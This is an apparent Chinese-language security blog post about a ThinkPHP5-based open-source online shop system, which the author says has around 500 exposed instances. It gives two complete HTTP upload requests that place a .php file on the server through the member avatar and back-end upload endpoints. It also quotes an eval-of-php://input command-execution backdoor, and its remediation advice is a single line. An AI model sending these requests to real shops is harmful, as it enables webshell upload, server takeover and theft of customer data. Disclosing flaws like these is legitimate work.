商城采用thinkphp5.0+MySQL开发语言开发,完全开源商城系统,可以用于企业,个人建立自己的网上免费商城,支持开源微信商城,开源小程序等
这是偶然发现的一套程序。比较小众用的人数不是很多。根据fofa的搜索目测独立IP数量在500+左右
前台后台任意文件上传
public function updateUserImg($uid, $type){
Log::write('开始更新会员头像');
$condition = array(
'uid' => $uid
);
$user_info = $this->user->getInfo($condition, $field = 'uid,qq_info,wx_info');
$qq_info = $user_info['qq_info'];
$wx_info = $user_info['wx_info'];
if($type=='qq'){
$qq_info_array = json_decode($qq_info, true);
$user_head_img = $qq_info_array['figureurl_qq_2'];
}elseif($type=='wchat'){
//Log::write('微信信息: ' . $wx_info);
$wx_info_array = json_decode($wx_info, true);
$user_head_img = $wx_info_array['headimgurl'];
}else{
$user_head_img = '';
}
$local_path = '';
if(!empty($user_head_img))
{
if(!file_exists('upload/user')){
$mode = intval('0777',8);
mkdir('upload/user',$mode,true);
if(!file_exists('upload/user'))
{
die('upload/user不可写,请检验读写权限!');
}
}
$local_path = 'upload/user/'.time().rand(111,999).'.png';
save_weixin_img($local_path, $user_head_img);
}
if(!empty($local_path))
{
$retval = $this->user->save(['user_headimg' => $local_path,], ['uid' => $uid]);
}else{
$retval = 0;
}
return $retval;
}
未进行任何的过滤,导致任意文件写入
利用:
POST /index.php?s=/member/person HTTP/1.1 Host: xxxx Content-Length: 924 Cache-Control: max-age=0 Origin: http://xxxx Upgrade-Insecure-Requests: 1 Content-Type: multipart/form-data; boundary=----WebKitFormBoundarySuT4zF1iypR1XEll User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.81 Safari/537.36 SE 2.X MetaSr 1.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Referer: http://xxxx/index.php?s=/member/person Accept-Language: zh-CN,zh;q=0.9 Cookie: PHPSESSID=tnvvs3e635nf8vc8bg7k7dcmh6; page_cookie=%7B%22page_index%22%3A1%2C%22show_number%22%3A%2214%22%2C%22url%22%3A%22http%3A%2F%2F120.79.244.0%2Findex.php%3Fs%3D%2Fadmin%2Fconfig%2Fshopnavigationlist%22%7D Connection: close ------WebKitFormBoundarySuT4zF1iypR1XEll Content-Disposition: form-data; name="user_headimg"; filename="5e5cbbe4725bb.php" Content-Type: image/jpeg ------WebKitFormBoundarySuT4zF1iypR1XEll Content-Disposition: form-data; name="act" act_edit_img ------WebKitFormBoundarySuT4zF1iypR1XEll Content-Disposition: form-data; name="submit2" 确认修改 ------WebKitFormBoundarySuT4zF1iypR1XEll--
后台同样未进行任何的过滤
POST /index.php?s=/wap/upload/uploadfile HTTP/1.1 Host: xxxx Content-Length: 73793 Cache-Control: max-age=0 Origin: http://xxxx Upgrade-Insecure-Requests: 1 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryilA30KLVw3Nyddto User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.81 Safari/537.36 SE 2.X MetaSr 1.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Referer: http://xxxx/index.php?s=/admin/auth/userdetail Accept-Language: zh-CN,zh;q=0.9 Cookie: PHPSESSID=tnvvs3e635nf8vc8bg7k7dcmh6; page_cookie=%7B%22page_index%22%3A1%2C%22show_number%22%3A%2214%22%2C%22url%22%3A%22http%3A%2F%2F120.79.244.0%2Findex.php%3Fs%3D%2Fadmin%2Fconfig%2Fshopnavigationlist%22%7D Connection: close ------WebKitFormBoundaryilA30KLVw3Nyddto Content-Disposition: form-data; name="file_path" upload/avator/ ------WebKitFormBoundaryilA30KLVw3Nyddto Content-Disposition: form-data; name="file_upload"; filename="5e5cbbe4725bb.php" Content-Type: image/jpeg xxxx ------WebKitFormBoundaryilA30KLVw3Nyddto--
任意命令执行后门
eval('?>' . file_get_contents('php://input')); 
修复建议:直接删除phpunit 或者修改为stdin
本文作者为lufei,转载请注明。